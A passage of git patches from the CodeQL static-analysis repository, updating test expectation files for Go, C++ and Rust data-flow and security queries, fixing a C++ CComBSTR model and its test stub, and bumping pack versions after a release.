utilityObject | | passwords.go:88:14:88:26 | utilityObject | semmle.label | utilityObject | | passwords.go:90:12:90:19 | password | semmle.label | password | | passwords.go:91:23:91:28 | secret | semmle.label | secret | @@ -173,13 +217,22 @@ nodes | passwords.go:116:14:116:45 | ...+... | semmle.label | ...+... | | passwords.go:116:28:116:36 | password1 | semmle.label | password1 | | passwords.go:116:28:116:45 | call to String | semmle.label | call to String | +| passwords.go:118:2:118:7 | definition of config | semmle.label | definition of config | +| passwords.go:118:2:118:7 | definition of config [x] | semmle.label | definition of config [x] | +| passwords.go:118:2:118:7 | definition of config [y] | semmle.label | definition of config [y] | | passwords.go:118:12:123:2 | struct literal | semmle.label | struct literal | | passwords.go:118:12:123:2 | struct literal [x] | semmle.label | struct literal [x] | | passwords.go:118:12:123:2 | struct literal [y] | semmle.label | struct literal [y] | | passwords.go:119:13:119:13 | x | semmle.label | x | | passwords.go:121:13:121:20 | password | semmle.label | password | | passwords.go:122:13:122:25 | call to getPassword | semmle.label | call to getPassword | +| passwords.go:125:2:125:20 | []type{args} [array, x] | semmle.label | []type{args} [array, x] | +| passwords.go:125:2:125:20 | []type{args} [array, y] | semmle.label | []type{args} [array, y] | +| passwords.go:125:2:125:20 | []type{args} [array] | semmle.label | []type{args} [array] | | passwords.go:125:14:125:19 | config | semmle.label | config | +| passwords.go:125:14:125:19 | config | semmle.label | config | +| passwords.go:125:14:125:19 | config [x] | semmle.label | config [x] | +| passwords.go:125:14:125:19 | config [y] | semmle.label | config [y] | | passwords.go:126:14:126:19 | config [x] | semmle.label | config [x] | | passwords.go:126:14:126:21 | selection of x | semmle.label | selection of x | | passwords.go:127:14:127:19 | config [y] | semmle.label | config [y] | diff --git a/go/ql/test/query-tests/Security/CWE-640/EmailInjection.expected b/go/ql/test/query-tests/Security/CWE-640/EmailInjection.expected index ac5985f110d..b729c7baf83 100644 --- a/go/ql/test/query-tests/Security/CWE-640/EmailInjection.expected +++ b/go/ql/test/query-tests/Security/CWE-640/EmailInjection.expected @@ -19,17 +19,41 @@ edges | main.go:46:21:46:31 | call to Referer | main.go:52:46:52:59 | untrustedInput | provenance | Src:MaD:2 | | main.go:46:21:46:31 | call to Referer | main.go:53:52:53:65 | untrustedInput | provenance | Src:MaD:2 | | main.go:58:21:58:31 | call to Referer | main.go:60:47:60:60 | untrustedInput | provenance | Src:MaD:2 | +| main.go:60:3:60:9 | definition of content | main.go:63:16:63:22 | content | provenance | | +| main.go:60:3:60:9 | definition of content | main.go:63:16:63:22 | content | provenance | | +| main.go:60:14:60:61 | call to NewContent | main.go:63:16:63:22 | content | provenance | | | main.go:60:14:60:61 | call to NewContent | main.go:63:16:63:22 | content | provenance | | | main.go:60:47:60:60 | untrustedInput | main.go:60:14:60:61 | call to NewContent | provenance | MaD:3 | +| main.go:63:3:63:23 | []type{args} [array] | main.go:60:3:60:9 | definition of content | provenance | | +| main.go:63:16:63:22 | content | main.go:63:3:63:23 | []type{args} [array] | provenance | | | main.go:68:21:68:31 | call to Referer | main.go:74:47:74:60 | untrustedInput | provenance | Src:MaD:2 | +| main.go:74:3:74:9 | definition of content | main.go:76:50:76:56 | content | provenance | | +| main.go:74:3:74:9 | definition of content | main.go:76:50:76:56 | content | provenance | | +| main.go:74:3:74:9 | definition of content | main.go:76:59:76:65 | content | provenance | | +| main.go:74:3:74:9 | definition of content | main.go:76:59:76:65 | content | provenance | | +| main.go:74:3:74:9 | definition of content | main.go:77:16:77:22 | content | provenance | | +| main.go:74:3:74:9 | definition of content | main.go:77:16:77:22 | content | provenance | | +| main.go:74:14:74:61 | call to NewContent | main.go:76:50:76:56 | content | provenance | | | main.go:74:14:74:61 | call to NewContent | main.go:76:50:76:56 | content | provenance | | | main.go:74:14:74:61 | call to NewContent | main.go:76:59:76:65 | content | provenance | | +| main.go:74:14:74:61 | call to NewContent | main.go:76:59:76:65 | content | provenance | | +| main.go:74:14:74:61 | call to NewContent | main.go:77:16:77:22 | content | provenance | | | main.go:74:14:74:61 | call to NewContent | main.go:77:16:77:22 | content | provenance | | | main.go:74:47:74:60 | untrustedInput | main.go:74:14:74:61 | call to NewContent | provenance | MaD:3 | +| main.go:76:8:76:66 | []type{args} [array] | main.go:74:3:74:9 | definition of content | provenance | | +| main.go:76:50:76:56 | content | main.go:76:8:76:66 | []type{args} [array] | provenance | | +| main.go:76:59:76:65 | content | main.go:76:8:76:66 | []type{args} [array] | provenance | | +| main.go:77:3:77:23 | []type{args} [array] | main.go:74:3:74:9 | definition of content | provenance | | +| main.go:77:16:77:22 | content | main.go:77:3:77:23 | []type{args} [array] | provenance | | | main.go:82:21:82:31 | call to Referer | main.go:89:37:89:50 | untrustedInput | provenance | Src:MaD:2 | | main.go:82:21:82:31 | call to Referer | main.go:91:48:91:61 | untrustedInput | provenance | Src:MaD:2 | +| main.go:91:3:91:10 | definition of content2 | main.go:93:16:93:23 | content2 | provenance | | +| main.go:91:3:91:10 | definition of content2 | main.go:93:16:93:23 | content2 | provenance | | +| main.go:91:15:91:62 | call to NewContent | main.go:93:16:93:23 | content2 | provenance | | | main.go:91:15:91:62 | call to NewContent | main.go:93:16:93:23 | content2 | provenance | | | main.go:91:48:91:61 | untrustedInput | main.go:91:15:91:62 | call to NewContent | provenance | MaD:3 | +| main.go:93:3:93:24 | []type{args} [array] | main.go:91:3:91:10 | definition of content2 | provenance | | +| main.go:93:16:93:23 | content2 | main.go:93:3:93:24 | []type{args} [array] | provenance | | models | 1 | Source: net/http; Request; true; Header; ; ; ; remote; manual | | 2 | Source: net/http; Request; true; Referer; ; ; ReturnValue; remote; manual | @@ -49,18 +73,30 @@ nodes | main.go:52:46:52:59 | untrustedInput | semmle.label | untrustedInput | | main.go:53:52:53:65 | untrustedInput | semmle.label | untrustedInput | | main.go:58:21:58:31 | call to Referer | semmle.label | call to Referer | +| main.go:60:3:60:9 | definition of content | semmle.label | definition of content | | main.go:60:14:60:61 | call to NewContent | semmle.label | call to NewContent | | main.go:60:47:60:60 | untrustedInput | semmle.label | untrustedInput | +| main.go:63:3:63:23 | []type{args} [array] | semmle.label | []type{args} [array] | +| main.go:63:16:63:22 | content | semmle.label | content | | main.go:63:16:63:22 | content | semmle.label | content | | main.go:68:21:68:31 | call to Referer | semmle.label | call to Referer | +| main.go:74:3:74:9 | definition of content | semmle.label | definition of content | | main.go:74:14:74:61 | call to NewContent | semmle.label | call to NewContent | | main.go:74:47:74:60 | untrustedInput | semmle.label | untrustedInput | +| main.go:76:8:76:66 | []type{args} [array] | semmle.label | []type{args} [array] | +| main.go:76:50:76:56 | content | semmle.label | content | | main.go:76:50:76:56 | content | semmle.label | content | | main.go:76:59:76:65 | content | semmle.label | content | +| main.go:76:59:76:65 | content | semmle.label | content | +| main.go:77:3:77:23 | []type{args} [array] | semmle.label | []type{args} [array] | +| main.go:77:16:77:22 | content | semmle.label | content | | main.go:77:16:77:22 | content | semmle.label | content | | main.go:82:21:82:31 | call to Referer | semmle.label | call to Referer | | main.go:89:37:89:50 | untrustedInput | semmle.label | untrustedInput | +| main.go:91:3:91:10 | definition of content2 | semmle.label | definition of content2 | | main.go:91:15:91:62 | call to NewContent | semmle.label | call to NewContent | | main.go:91:48:91:61 | untrustedInput | semmle.label | untrustedInput | +| main.go:93:3:93:24 | []type{args} [array] | semmle.label | []type{args} [array] | +| main.go:93:16:93:23 | content2 | semmle.label | content2 | | main.go:93:16:93:23 | content2 | semmle.label | content2 | subpaths From 3d0a2057f61d9564e7741f638214d650ac646a67 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Fri, 6 Dec 2024 15:46:14 +0000 Subject: [PATCH 0908/1267] C++: Fix 'BSTRToArray' stub and MaD model. --- cpp/ql/lib/ext/CComBSTR.model.yml | 2 +- .../dataflow/external-models/flow.expected | 10 +++++----- cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp | 6 +++--- .../dataflow/taint-tests/localTaint.expected | 4 ++-- .../dataflow/taint-tests/test_mad-signatures.expected | 2 +- 5 files changed, 12 insertions(+), 12 deletions(-) diff --git a/cpp/ql/lib/ext/CComBSTR.model.yml b/cpp/ql/lib/ext/CComBSTR.model.yml index 1865a244ef3..d31f3e36a51 100644 --- a/cpp/ql/lib/ext/CComBSTR.model.yml +++ b/cpp/ql/lib/ext/CComBSTR.model.yml @@ -20,7 +20,7 @@ extensions: - ["", "CComBSTR", True, "ArrayToBSTR", "", "", "Argument[*0].Field[*pvData]", "Argument[-1]", "value", "manual"] - ["", "CComBSTR", True, "AssignBSTR", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - ["", "CComBSTR", True, "Attach", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CComBSTR", True, "BSTRToArray", "", "", "Argument[-1]", "Argument[*0].Field[*pvData]", "value", "manual"] + - ["", "CComBSTR", True, "BSTRToArray", "", "", "Argument[-1]", "Argument[**0].Field[*pvData]", "value", "manual"] - ["", "CComBSTR", True, "Copy", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - ["", "CComBSTR", True, "CopyTo", "", "", "Argument[-1]", "Argument[*0]", "value", "manual"] - ["", "CComBSTR", True, "LoadString", "(HINSTANCE,UINT)", "", "Argument[1]", "Argument[-1]", "taint", "manual"] diff --git a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected index 137642d522a..81a9c605f00 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected @@ -11,14 +11,14 @@ edges | asio_streams.cpp:100:44:100:62 | call to buffer | asio_streams.cpp:103:29:103:39 | *send_buffer | provenance | Sink:MaD:6 | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | provenance | | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:100:44:100:62 | call to buffer | provenance | MaD:10 | -| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:801 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:799 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:800 | +| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:800 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:798 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:799 | | test.cpp:7:10:7:18 | call to ymlSource | test.cpp:13:18:13:18 | x | provenance | | | test.cpp:13:10:13:16 | call to ymlStep | test.cpp:13:10:13:16 | call to ymlStep | provenance | | -| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:800 | +| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:799 | | test.cpp:13:18:13:18 | x | test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | provenance | | -| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:801 | +| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:800 | nodes | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | semmle.label | [summary param] *0 in buffer | | asio_streams.cpp:56:18:56:23 | [summary] to write: ReturnValue in buffer | semmle.label | [summary] to write: ReturnValue in buffer | diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 05d14c06c36..9a57fd604a5 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -426,7 +426,7 @@ struct CComBSTR { HRESULT ArrayToBSTR(const SAFEARRAY* pSrc) throw(); HRESULT AssignBSTR(const BSTR bstrSrc) throw(); void Attach(BSTR src) throw(); - HRESULT BSTRToArray(LPSAFEARRAY ppArray) throw(); + HRESULT BSTRToArray(LPSAFEARRAY* ppArray) throw(); unsigned int ByteLength() const throw(); BSTR Copy() const throw(); HRESULT CopyTo(BSTR* pbstr) throw(); @@ -504,10 +504,10 @@ void test_CComBSTR() { sink(b8.m_str); // $ ir CComBSTR b9; - SAFEARRAY safe; + LPSAFEARRAY safe; b9.Append(source()); b9.BSTRToArray(&safe); - sink(safe.pvData); // $ ir + sink(safe->pvData); // $ ir sink(b9.Copy()); // $ ir } diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index a35e1c53d1c..d3ee7b7c089 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected @@ -606,8 +606,8 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:506:14:506:15 | call to CComBSTR | atl.cpp:509:5:509:6 | b9 | | | atl.cpp:506:14:506:15 | call to CComBSTR | atl.cpp:512:10:512:11 | b9 | | | atl.cpp:506:14:506:15 | call to CComBSTR | atl.cpp:513:3:513:3 | b9 | | -| atl.cpp:507:15:507:18 | safe | atl.cpp:509:21:509:24 | safe | | -| atl.cpp:507:15:507:18 | safe | atl.cpp:510:10:510:13 | safe | | +| atl.cpp:507:17:507:20 | safe | atl.cpp:509:21:509:24 | safe | | +| atl.cpp:507:17:507:20 | safe | atl.cpp:510:10:510:13 | safe | | | atl.cpp:508:5:508:6 | ref arg b9 | atl.cpp:509:5:509:6 | b9 | | | atl.cpp:508:5:508:6 | ref arg b9 | atl.cpp:512:10:512:11 | b9 | | | atl.cpp:508:5:508:6 | ref arg b9 | atl.cpp:513:3:513:3 | b9 | | diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected index f1e4b841d87..6627139ae6e 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected @@ -613,7 +613,7 @@ getParameterTypeName | atl.cpp:426:11:426:21 | ArrayToBSTR | 0 | const SAFEARRAY * | | atl.cpp:427:11:427:20 | AssignBSTR | 0 | const BSTR | | atl.cpp:428:8:428:13 | Attach | 0 | BSTR | -| atl.cpp:429:11:429:21 | BSTRToArray | 0 | LPSAFEARRAY | +| atl.cpp:429:11:429:21 | BSTRToArray | 0 | LPSAFEARRAY * | | atl.cpp:432:11:432:16 | CopyTo | 0 | BSTR * | | atl.cpp:434:11:434:16 | CopyTo | 0 | VARIANT * | | atl.cpp:438:8:438:17 | LoadString | 0 | HINSTANCE | From 1ceee769199a6a8d0572c816a8b63d0f415ff2d9 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 6 Dec 2024 15:52:08 +0000 Subject: [PATCH 0909/1267] Rust: Get the .expected values right this time. --- rust/ql/integration-tests/hello-project/summary.expected | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rust/ql/integration-tests/hello-project/summary.expected b/rust/ql/integration-tests/hello-project/summary.expected index 6912eb2c52d..5972bf15827 100644 --- a/rust/ql/integration-tests/hello-project/summary.expected +++ b/rust/ql/integration-tests/hello-project/summary.expected @@ -5,7 +5,7 @@ | Files extracted - total | 5 | | Files extracted - with errors | 1 | | Files extracted - without errors | 4 | -| Files extracted - without errors % | 100 | +| Files extracted - without errors % | 80 | | Inconsistencies - AST | 0 | | Inconsistencies - CFG | 0 | | Inconsistencies - data flow | 0 | From 59f4b3c0db3d12177b34950c0070af798f8fa7e2 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Fri, 6 Dec 2024 15:58:07 +0000 Subject: [PATCH 0910/1267] C++: Get rid of the model for 'Create'. --- cpp/ql/lib/ext/CComSafeArray.model.yml | 1 - .../dataflow/external-models/flow.expected | 10 +++++----- .../dataflow/external-models/validatemodels.expected | 1 - .../dataflow/taint-tests/test_mad-signatures.expected | 3 --- 4 files changed, 5 insertions(+), 10 deletions(-) diff --git a/cpp/ql/lib/ext/CComSafeArray.model.yml b/cpp/ql/lib/ext/CComSafeArray.model.yml index 8da350ff140..61aec61e7d2 100644 --- a/cpp/ql/lib/ext/CComSafeArray.model.yml +++ b/cpp/ql/lib/ext/CComSafeArray.model.yml @@ -11,7 +11,6 @@ extensions: - ["", "CComSafeArray", True, "Attach", "", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] - ["", "CComSafeArray", True, "CopyFrom", "", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] - ["", "CComSafeArray", True, "CopyTo", "", "", "Argument[-1].Field[*m_psa]", "Argument[*0]", "value", "manual"] - - ["", "CComSafeArray", True, "Create", "(const SAFEARRAYBOUND *,UINT)", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] - ["", "CComSafeArray", True, "GetAt", "", "", "Argument[-1].Field[*m_psa].Field[*@pvData]", "ReturnValue[*@]", "value", "manual"] - ["", "CComSafeArray", True, "GetLowerBound", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["", "CComSafeArray", True, "GetSafeArrayPtr", "", "", "Argument[-1].Field[*m_psa]", "ReturnValue[*]", "value", "manual"] diff --git a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected index 81a9c605f00..8930cadb8d8 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected @@ -11,14 +11,14 @@ edges | asio_streams.cpp:100:44:100:62 | call to buffer | asio_streams.cpp:103:29:103:39 | *send_buffer | provenance | Sink:MaD:6 | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | provenance | | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:100:44:100:62 | call to buffer | provenance | MaD:10 | -| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:800 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:798 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:799 | +| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:799 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:797 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:798 | | test.cpp:7:10:7:18 | call to ymlSource | test.cpp:13:18:13:18 | x | provenance | | | test.cpp:13:10:13:16 | call to ymlStep | test.cpp:13:10:13:16 | call to ymlStep | provenance | | -| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:799 | +| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:798 | | test.cpp:13:18:13:18 | x | test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | provenance | | -| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:800 | +| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:799 | nodes | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | semmle.label | [summary param] *0 in buffer | | asio_streams.cpp:56:18:56:23 | [summary] to write: ReturnValue in buffer | semmle.label | [summary] to write: ReturnValue in buffer | diff --git a/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected b/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected index 7b089db8a6d..423e238ecd7 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected @@ -21,7 +21,6 @@ | Dubious signature "(const CComSafeArray &)" in summary model. | | Dubious signature "(const SAFEARRAY &)" in summary model. | | Dubious signature "(const SAFEARRAY *)" in summary model. | -| Dubious signature "(const SAFEARRAYBOUND *,UINT)" in summary model. | | Dubious signature "(const T &,BOOL)" in summary model. | | Dubious signature "(const deque &)" in summary model. | | Dubious signature "(const deque &,const Allocator &)" in summary model. | diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected index 6627139ae6e..2d69f088fef 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected @@ -35,7 +35,6 @@ signatureMatches | atl.cpp:426:11:426:21 | ArrayToBSTR | (const SAFEARRAY *) | CComSafeArray | operator= | 0 | | atl.cpp:438:8:438:17 | LoadString | (HINSTANCE,UINT) | CComBSTR | LoadString | 0 | | atl.cpp:438:8:438:17 | LoadString | (HINSTANCE,UINT) | CComBSTR | LoadString | 1 | -| atl.cpp:438:8:438:17 | LoadString | (const SAFEARRAYBOUND *,UINT) | CComSafeArray | Create | 1 | | atl.cpp:439:8:439:17 | LoadString | (UINT) | CComBSTR | LoadString | 0 | | atl.cpp:439:8:439:17 | LoadString | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | | atl.cpp:447:13:447:22 | operator+= | (const CComBSTR &) | CComBSTR | Append | 0 | @@ -419,8 +418,6 @@ getSignatureParameterName | (const SAFEARRAY *) | CComSafeArray | Add | 0 | const SAFEARRAY * | | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | const SAFEARRAY * | | (const SAFEARRAY *) | CComSafeArray | operator= | 0 | const SAFEARRAY * | -| (const SAFEARRAYBOUND *,UINT) | CComSafeArray | Create | 0 | const SAFEARRAYBOUND * | -| (const SAFEARRAYBOUND *,UINT) | CComSafeArray | Create | 1 | UINT | | (const T &,BOOL) | CComSafeArray | Add | 0 | const class:0 & | | (const T &,BOOL) | CComSafeArray | Add | 1 | BOOL | | (const deque &) | deque | deque | 0 | const deque & | From 9b34615a645f420e7d2a6f4dabbdf77baf248d67 Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Fri, 6 Dec 2024 19:05:53 +0100 Subject: [PATCH 0911/1267] Rust: Update test assertions to match results --- rust/ql/test/library-tests/variables/variables.expected | 4 ---- rust/ql/test/library-tests/variables/variables.rs | 6 +++--- 2 files changed, 3 insertions(+), 7 deletions(-) diff --git a/rust/ql/test/library-tests/variables/variables.expected b/rust/ql/test/library-tests/variables/variables.expected index d0141b2e1e8..1e3fc90633c 100644 --- a/rust/ql/test/library-tests/variables/variables.expected +++ b/rust/ql/test/library-tests/variables/variables.expected @@ -1,8 +1,4 @@ testFailures -| variables.rs:493:13:493:16 | self | Unexpected result: read_access=self | -| variables.rs:493:25:493:25 | n | Unexpected result: read_access=n | -| variables.rs:495:9:495:9 | f | Unexpected result: read_access=f | -| variables.rs:496:9:496:9 | f | Unexpected result: read_access=f | variable | variables.rs:3:14:3:14 | s | | variables.rs:7:14:7:14 | i | diff --git a/rust/ql/test/library-tests/variables/variables.rs b/rust/ql/test/library-tests/variables/variables.rs index 73d350f2496..155ebaa8584 100644 --- a/rust/ql/test/library-tests/variables/variables.rs +++ b/rust/ql/test/library-tests/variables/variables.rs @@ -490,10 +490,10 @@ impl MyStruct { fn my_method(&mut self) { let mut f = |n| { // Capture of `self` - self.val += n; + self.val += n; // $ read_access=self read_access=n }; - f(3); - f(4); + f(3); // $ read_access=f + f(4); // $ read_access=f } } From 3a3eb001e39523c19365df1706c5d7131b4642e2 Mon Sep 17 00:00:00 2001 From: Jeroen Ketema Date: Fri, 6 Dec 2024 19:53:06 +0100 Subject: [PATCH 0912/1267] C++: Fix word duplication in change note --- .../change-notes/2024-12-05-wrong-number-format-arguments.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/src/change-notes/2024-12-05-wrong-number-format-arguments.md b/cpp/ql/src/change-notes/2024-12-05-wrong-number-format-arguments.md index abae2dfaa3d..6b41378f556 100644 --- a/cpp/ql/src/change-notes/2024-12-05-wrong-number-format-arguments.md +++ b/cpp/ql/src/change-notes/2024-12-05-wrong-number-format-arguments.md @@ -1,4 +1,4 @@ --- category: minorAnalysis --- -* The "Too few arguments to formatting function" query (`cpp/wrong-number-format-arguments`) query no longer produces results if an argument has an extraction error. +* The "Too few arguments to formatting function" query (`cpp/wrong-number-format-arguments`) no longer produces results if an argument has an extraction error. From dbe8f98e183b58c716a44c025dab58ec69b9d65c Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" Date: Fri, 6 Dec 2024 21:19:19 +0000 Subject: [PATCH 0913/1267] Post-release preparation for codeql-cli-2.20.0 --- cpp/ql/lib/qlpack.yml | 2 +- cpp/ql/src/qlpack.yml | 2 +- csharp/ql/campaigns/Solorigate/lib/qlpack.yml | 2 +- csharp/ql/campaigns/Solorigate/src/qlpack.yml | 2 +- csharp/ql/lib/qlpack.yml | 2 +- csharp/ql/src/qlpack.yml | 2 +- go/ql/consistency-queries/qlpack.yml | 2 +- go/ql/lib/qlpack.yml | 2 +- go/ql/src/qlpack.yml | 2 +- java/ql/lib/qlpack.yml | 2 +- java/ql/src/qlpack.yml | 2 +- javascript/ql/lib/qlpack.yml | 2 +- javascript/ql/src/qlpack.yml | 2 +- misc/suite-helpers/qlpack.yml | 2 +- python/ql/lib/qlpack.yml | 2 +- python/ql/src/qlpack.yml | 2 +- ruby/ql/lib/qlpack.yml | 2 +- ruby/ql/src/qlpack.yml | 2 +- shared/controlflow/qlpack.yml | 2 +- shared/dataflow/qlpack.yml | 2 +- shared/mad/qlpack.yml | 2 +- shared/rangeanalysis/qlpack.yml | 2 +- shared/regex/qlpack.yml | 2 +- shared/ssa/qlpack.yml | 2 +- shared/threat-models/qlpack.yml | 2 +- shared/tutorial/qlpack.yml | 2 +- shared/typeflow/qlpack.yml | 2 +- shared/typetracking/qlpack.yml | 2 +- shared/typos/qlpack.yml | 2 +- shared/util/qlpack.yml | 2 +- shared/xml/qlpack.yml | 2 +- shared/yaml/qlpack.yml | 2 +- swift/ql/lib/qlpack.yml | 2 +- swift/ql/src/qlpack.yml | 2 +- 34 files changed, 34 insertions(+), 34 deletions(-) diff --git a/cpp/ql/lib/qlpack.yml b/cpp/ql/lib/qlpack.yml index 723a2c3544e..4bb4b04e02f 100644 --- a/cpp/ql/lib/qlpack.yml +++ b/cpp/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/cpp-all -version: 3.0.0 +version: 3.0.1-dev groups: cpp dbscheme: semmlecode.cpp.dbscheme extractor: cpp diff --git a/cpp/ql/src/qlpack.yml b/cpp/ql/src/qlpack.yml index 824ee1459aa..940c3e2a4cb 100644 --- a/cpp/ql/src/qlpack.yml +++ b/cpp/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/cpp-queries -version: 1.3.0 +version: 1.3.1-dev groups: - cpp - queries diff --git a/csharp/ql/campaigns/Solorigate/lib/qlpack.yml b/csharp/ql/campaigns/Solorigate/lib/qlpack.yml index daac6be2fbb..781915bf1a1 100644 --- a/csharp/ql/campaigns/Solorigate/lib/qlpack.yml +++ b/csharp/ql/campaigns/Solorigate/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/csharp-solorigate-all -version: 1.7.30 +version: 1.7.31-dev groups: - csharp - solorigate diff --git a/csharp/ql/campaigns/Solorigate/src/qlpack.yml b/csharp/ql/campaigns/Solorigate/src/qlpack.yml index 1b3b911c6f1..979d8e6c661 100644 --- a/csharp/ql/campaigns/Solorigate/src/qlpack.yml +++ b/csharp/ql/campaigns/Solorigate/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/csharp-solorigate-queries -version: 1.7.30 +version: 1.7.31-dev groups: - csharp - solorigate diff --git a/csharp/ql/lib/qlpack.yml b/csharp/ql/lib/qlpack.yml index d985d58b112..81a55470a4d 100644 --- a/csharp/ql/lib/qlpack.yml +++ b/csharp/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/csharp-all -version: 4.0.0 +version: 4.0.1-dev groups: csharp dbscheme: semmlecode.csharp.dbscheme extractor: csharp diff --git a/csharp/ql/src/qlpack.yml b/csharp/ql/src/qlpack.yml index f838d279d87..e4d9400d96d 100644 --- a/csharp/ql/src/qlpack.yml +++ b/csharp/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/csharp-queries -version: 1.0.13 +version: 1.0.14-dev groups: - csharp - queries diff --git a/go/ql/consistency-queries/qlpack.yml b/go/ql/consistency-queries/qlpack.yml index 72aeab276d7..1812705438c 100644 --- a/go/ql/consistency-queries/qlpack.yml +++ b/go/ql/consistency-queries/qlpack.yml @@ -1,5 +1,5 @@ name: codeql-go-consistency-queries -version: 1.0.13 +version: 1.0.14-dev groups: - go - queries diff --git a/go/ql/lib/qlpack.yml b/go/ql/lib/qlpack.yml index df0d0e9d5fc..4e72aa3857b 100644 --- a/go/ql/lib/qlpack.yml +++ b/go/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: 